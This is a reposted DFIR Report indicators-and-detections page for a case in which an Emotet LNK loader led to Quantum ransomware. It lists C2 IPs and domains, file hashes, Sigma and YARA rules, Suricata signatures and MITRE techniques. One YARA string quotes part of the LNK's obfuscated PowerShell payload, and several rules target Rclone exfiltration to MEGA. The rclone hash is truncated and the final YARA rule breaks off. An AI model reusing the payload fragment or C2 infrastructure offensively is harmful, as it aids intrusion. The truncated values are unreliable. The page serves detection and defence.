dilsrl[.]com

Emotet C2 Servers
103.159.224.46
103.75.201.2
119.193.124.41
128.199.225.17
131.100.24.231
139.59.60.88
144.217.88.125
146.59.226.45
149.56.131.28
159.89.202.34
165.22.211.113
165.227.166.238
178.128.82.218
209.126.98.206
213.32.75.32
37.187.115.122
45.226.53.34
45.55.134.126
46.55.222.11
51.210.176.76
51.254.140.238
54.37.70.105
82.223.82.69
91.207.181.106
92.114.18.20
94.23.45.86
96.125.171.165

Cobalt Strike
139.60.161.167 (survefuz[.]com)
139.60.160.18 (juanjik[.]com)

Tactical RMM Agent
api.floppasoftware[.]com
mesh.floppasoftware[.]com
212.73.150.62

Computed

K-1 06.13.2022.lnk
de7c4da78a6cbba096e32e5eecb00566
02b4f495e9995cc2251c19cd9984763f52122951
1bf9314ae67ab791932c43e6c64103b1b572a88035447dae781bffd21a1187ad

17jun.exe
0ea68856c4f56f4056502208e97e9033
b80c987c8849bf7905ea8f283b79d98753e3c15a
41e230134deca492704401ddf556ee2198ef6f32b868ec626d9aefbf268ab6b1

dontsleep.exe
50cc3a3bca96d7096c8118e838d9bc16
b286b58ed32b6df4ecdb5df86d7d7d177bb7bfaf
f8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee

locker.dll
d2df4601c8d43e655163c0b292bc4cc9
f6727d5d04f2728a3353fbd45d7b2cb19e98802c
6424b4983f83f477a5da846a1dc3e2565b7a7d88ae3f084f3d3884c43aec5df6

netscan.exe
27f7186499bc8d10e51d17d3d6697bc5
52332ce16ee0c393b8eea6e71863ad41e3caeafd
18f0898d595ec054d13b02915fb7d3636f65b8e53c0c66b3c7ee3b6fc37d3566

rclone.exe
22bbe1747933531e9c240e0db86268e2
c2a8776e21403eb00b38bfccd36d1c03dffb009e
53ae3567a34097f29011d752f1d3afab8f92beb36a8d6a5df5c1d4b12edc

Behavioral

The threat actor delivered Emotet via a Emotet loader in the form of a LNK file responsible for dropping Emotet via Powershell (K-1 06.13.2022.lnk).
Tactical RMM Agent was installed by the threat actor on a server to ensure remote access (17jun.exe).
Data was exfiltrated to Mega cloud service via Rclone (rclone.exe).
Network mapping was performed using SoftPerfect Network Scanner (netscan.exe) followed by Quantum ransomware execution and propagation in the network (locker.dll).
The threat actor kept the remote desktop session alive by running a program to keep the session active (dontsleep.exe)

Detections

Network

The DFIR Report Cobalt Strike 139.60.160.18
The DFIR Report Cobalt Strike 139.60.161.167
ET Threatview.io High Confidence Cobalt Strike C2 IP group 1
ET POLICY SMB2 NT Create AndX Request For an Executable File
ET POLICY SMB Executable File Transfer
ET RPC DCERPC SVCCTL - Remote Service Control Manager Access
ET INFO Observed External IP Lookup Domain (icanhazip .com in TLS SNI)t
ET JA3 HASH - Possible Rclone Client Response (Mega Storage)
ET POLICY HTTP POST to MEGA Userstorage
ET POLICY SMB Executable File Transfer
ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement
ET POLICY SMB2 NT Create AndX Request For an Executable File
ET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)
ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection
ET USER_AGENTS AnyDesk Remote Desktop Software User-Agent
ET CNC Feodo Tracker Reported CnC Server group 1
ET CNC Feodo Tracker Reported CnC Server group 14
ET CNC Feodo Tracker Reported CnC Server group 15
ET CNC Feodo Tracker Reported CnC Server group 17
ET CNC Feodo Tracker Reported CnC Server group 19
ET CNC Feodo Tracker Reported CnC Server group 2
ET CNC Feodo Tracker Reported CnC Server group 20
ET CNC Feodo Tracker Reported CnC Server group 21
ET CNC Feodo Tracker Reported CnC Server group 23
ET CNC Feodo Tracker Reported CnC Server group 24
ET CNC Feodo Tracker Reported CnC Server group 25
ET CNC Feodo Tracker Reported CnC Server group 3
ET CNC Feodo Tracker Reported CnC Server group 4
ET CNC Feodo Tracker Reported CnC Server group 5
ET CNC Feodo Tracker Reported CnC Server group 6
ET CNC Feodo Tracker Reported CnC Server group 7
ET CNC Feodo Tracker Reported CnC Server group 8
ET CNC Feodo Tracker Reported CnC Server group 9
ET MALWARE W32/Emotet CnC Beacon 3

Sigma

Custom Rules

title: Emotet Child Process Spawn Pattern
id: 50e8cf53-62df-49aa-bbde-8b3a0a6d8a35
status: Experimental
description: Detects Emotet Spawning ipconfig and systeminfo.
author: TheDFIRReport
references:
- https://thedfirreport.com/
date: 2022/10/03
logsource:
category: process_creation
product: windows
detection:
selection_image:
CommandLine:
- 'ipconfig /all'
- 'systeminfo'
selection_parent:
ParentImage|endswith:
- 'regsvr32.exe'
selection_parent_cmdline:
ParentCommandLine|contains:
- '.dll'
condition: selection_image and selection_parent and selection_parent_cmdline
falsepositives:
- Unknown
level: high
tags:
- attack.discovery
- attack.t1087

 

https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_embed_exe_lnk.yml

https://github.com/NVISOsecurity/sigma-public/blob/master/rules/windows/process_creation/win_susp_recon_activity.yml

https://github.com/SigmaHQ/sigma/blob/1f8e37351e7c5d89ce7808391edaef34bd8db6c0/rules/windows/process_creation/proc_creation_win_nltest_recon.yml

https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml

https://github.com/SigmaHQ/sigma/blob/1f8e37351e7c5d89ce7808391edaef34bd8db6c0/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml

https://github.com/SigmaHQ/sigma/blob/a3eed2b760abddfd62014fcf9ae81f435b216473/rules/windows/process_access/proc_access_win_lsass_memdump.yml

https://github.com/SigmaHQ/sigma/blob/3a2079b02bcb1a2653ba9b5a5f56fd8b14a59820/rules/windows/builtin/system/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml

https://github.com/SigmaHQ/sigma/blob/1f8e37351e7c5d89ce7808391edaef34bd8db6c0/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml

https://github.com/SigmaHQ/sigma/blob/8b749fb1260b92b9170e4e69fa1bd2f34e94d766/rules/windows/builtin/system/win_system_anydesk_service_installation.yml

https://github.com/SigmaHQ/sigma/blob/74e2d1bd3cec8fa72ba06cf4eef8e58fb5e0e237/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml

https://github.com/SigmaHQ/sigma/blob/08651822714c977d40d3c126c20ba4033d6836d3/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml


Yara

 /*
YARA Rule Set
Author: The DFIR Report
Date: 2022-11-28
Identifier: Quantum Ransomware - Case 15184
Reference: https://thedfirreport.com
*/


/* Rule Set ----------------------------------------------------------------- */


rule ___FilesToHash_17jun {
meta:
description = "15184_ - file 17jun.exe"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2022-11-28"
hash1 = "41e230134deca492704401ddf556ee2198ef6f32b868ec626d9aefbf268ab6b1"
strings:
$x1 = " to unallocated span37252902984619140625Arabic Standard TimeAzores Standard TimeCertOpenSystemStoreWCreateProcessAsUserWCryptAcq" ascii
$x2 = "0123456789abcdefghijklmnopqrstuvwxyz444089209850062616169452667236328125ERROR: unable to download agent fromGo pointer stored in" ascii
$x3 = ".lib section in a.out corrupted11368683772161602973937988281255684341886080801486968994140625CLIENT_HANDSHAKE_TRAFFIC_SECRETCent" ascii
$x4 = "slice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to palloc" ascii
$x5 = "VirtualQuery for stack base failedadding nil Certificate to CertPoolbad scalar length: %d, expected %dchacha20: wrong HChaCha20 " ascii
$x6 = "file descriptor in bad statefindrunnable: netpoll with pforgetting unknown stream idfound pointer to free objectgcBgMarkWorker: " ascii
$x7 = "tls: certificate used with invalid signature algorithmtls: server resumed a session with a different versionx509: cannot verify " ascii
$x8 = "non-IPv4 addressnon-IPv6 addressobject is remotepacer: H_m_prev=proxy-connectionreflect mismatchremote I/O errorruntime: g: g=" ascii
$x9 = "lock: lock countslice bounds out of rangesocket type not supportedstartm: p has runnable gsstoplockedm: not runnablestrict-trans" ascii
$x10 = "unixpacketunknown pcuser-agentws2_32.dll of size (targetpc= ErrCode=%v KiB work, freeindex= gcwaiting= idleprocs= in status " ascii
$x11 = "100-continue152587890625762939453125Bidi_ControlCIDR addressCONTINUATIONContent TypeContent-TypeCookie.ValueECDSA-SHA256ECDSA-SH" ascii
$x12 = "entersyscallexit status gcBitsArenasgcpacertracegetaddrinfowhost is downhttp2debug=1http2debug=2illegal seekinvalid baseinvalid " ascii
$x13 = "streamSafe was not resetstructure needs cleaningtext/html; charset=utf-8unexpected buffer len=%vx509: malformed validityzlib: in" ascii
$x14 = "IP addressInstaller:Keep-AliveKharoshthiLockFileExManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOther_MathPOSTALCO" ascii
$x15 = " to non-Go memory , locked to thread298023223876953125: day out of rangeArab Standard TimeCaucasian_AlbanianCommandLineToArgvWCr" ascii
$x16 = "= flushGen for type gfreecnt= pages at runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= target" ascii
$x17 = "(unknown), newval=, oldval=, plugin:, size = , tail = --site-id244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDi" ascii
$x18 = " is unavailable()<>@,;:\"/[]?=,M3.2.0,M11.1.00601021504Z0700476837158203125: cannot parse <invalid Value>ASCII_Hex_DigitAccept" ascii
$x19 = "span set block with unpopped elements found in resettls: received a session ticket with invalid lifetimetls: server selected uns" ascii
$x20 = "bad defer entry in panicbad defer size class: i=bypassed recovery failedcan't scan our own stackcertificate unobtainablechacha20" ascii
condition:
uint16(0) == 0x5a4d and filesize < 14000KB and
1 of ($x*)
}


rule dontsleep {
meta:
description = "15184_ - file dontsleep.exe"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2022-11-28"
hash1 = "f8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee"
strings:
$s1 = "shell32.dll,Control_RunDLL" fullword ascii
$s2 = "powrprof.DLL" fullword wide
$s3 = "CREATEPROCESS_MANIFEST_RESOURCE_ID RT_MANIFEST "res\\APP.exe.manifest"" fullword ascii
$s4 = "msinfo32.exe" fullword ascii
$s5 = "user32.dll,LockWorkStation" fullword wide
$s6 = "DontSleep.exe" fullword wide
$s7 = "UMServer.log" fullword ascii
$s8 = "_Autoupdate.exe" fullword ascii
$s9 = "BlockbyExecutionState: %d on:%d by_enable:%d" fullword wide
$s10 = "powrprof.dll,SetSuspendState" fullword wide
$s11 = "%UserProfile%" fullword wide
$s12 = " 2010-2019 Nenad Hrg SoftwareOK.com" fullword wide
$s13 = "https://sectigo.com/CPS0C" fullword ascii
$s14 = "https://sectigo.com/CPS0D" fullword ascii
$s15 = "?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v" fullword ascii
$s16 = "Unable to get response from Accept Thread withing specified Timeout ->" fullword ascii
$s17 = "3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%" fullword ascii
$s18 = "Unable to get response from Helper Thread within specified Timeout ->" fullword ascii
$s19 = " <requestedExecutionLevel level="asInvoker" uiAccess="false">" fullword ascii
$s20 = "_selfdestruct.bat" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 700KB and
8 of them
}


rule ___FilesToHash_locker {
meta:
description = "15184_ - file locker.dll"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2022-11-28"
hash1 = "6424b4983f83f477a5da846a1dc3e2565b7a7d88ae3f084f3d3884c43aec5df6"
strings:
$s1 = "plugin.dll" fullword ascii
$s2 = "oL$0fE" fullword ascii /* Goodware String - occured 1 times */
$s3 = "H9CPtgL9{@tafD9{8tZD" fullword ascii
$s4 = "expand 32-byte k" fullword ascii /* Goodware String - occured 1 times */
$s5 = "oD$@fD" fullword ascii /* Goodware String - occured 3 times */
$s6 = "oF D3f0D3n4D3v8D3~<H" fullword ascii
$s7 = "j]{7r]Y" fullword ascii
$s8 = "EA>EmA" fullword ascii
$s9 = "ol$0fE" fullword ascii
$s10 = "S{L1I{" fullword ascii
$s11 = "V32D!RT" fullword ascii
$s12 = " A_A^_" fullword ascii
$s13 = "v`L4~`g" fullword ascii
$s14 = "9\$8vsH" fullword ascii
$s15 = "K:_Rich" fullword ascii
$s16 = " A_A^A\_^" fullword ascii
$s17 = "tsf90u" fullword ascii
$s18 = "9|$0vQ" fullword ascii
$s19 = "K:_=:?^" fullword ascii
$s20 = ":9o 49" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 200KB and
8 of them
}


rule K_1_06_13_2022_lnk {
meta:
description = "15184_ - file K-1 06.13.2022.lnk.lnk"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2022-11-28"
hash1 = "1bf9314ae67ab791932c43e6c64103b1b572a88035447dae781bffd21a1187ad"
strings:
$x1 = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" fullword ascii
$s2 = "%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" fullword wide
$s3 = "<..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" fullword wide
$s4 = "-c "&{'p8ArwZsj8ZO+Zy/dHPeI+siGhbaxtEhzwmd3zVObm9uG2CGKqz5m4AdzKWWzPmKrjJieG4O9';$BxQ='uYnIvc3RhdHMvUkppMnJRSTRRWHJXQ2ZnZG1pLyI" wide
$s5 = "WindowsPowerShell" fullword wide
$s6 = "black-dog" fullword ascii
$s7 = "powershell.exe" fullword wide /* Goodware String - occured 3 times */
$s8 = "S-1-5-21-1499925678-132529631-3571256938-1001" fullword wide
condition:
uint16(0) == 0x004c and filesize < 10KB and
1 of ($x*) and all of the

MITRE

PowerShell – T1059.001

Process Injection – T1055

File Deletion – T1070.004

Lateral Tool Transfer – T1570

Valid Accounts – T1078

Service Execution – T1569.002

SMB/Windows Admin Shares – T1021.002

Remote System Discovery – T1018

Process Discovery – T1057

Rundll32 – T1218.011

Regsvr32 – T1218.010

Domain Account – T1087.002

Domain Groups – T1069.002

System Information Discovery – T1082

Data Encrypted for Impact – T1486

Network Share Discovery – T1135

Data from Network Shared Drive – T1039

Web Protocols – T1071.001

Remote Access Software – T1219

Exfiltration to Cloud Storage – T1567.002

Remote Desktop Protocol – T1021.001

Malicious File – T1204.002

Spearphishing Attachment – T1566.001

Exploitation of Remote Services – T1210

Internal case #15184


原文始发于微信公众号(军机故阁):Emotet 再次来袭——Lnk 文件导致全域勒索软件

版权声明:admin 发表于 2022年12月1日 下午7:36。
转载请注明:Emotet 再次来袭——Lnk 文件导致全域勒索软件 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...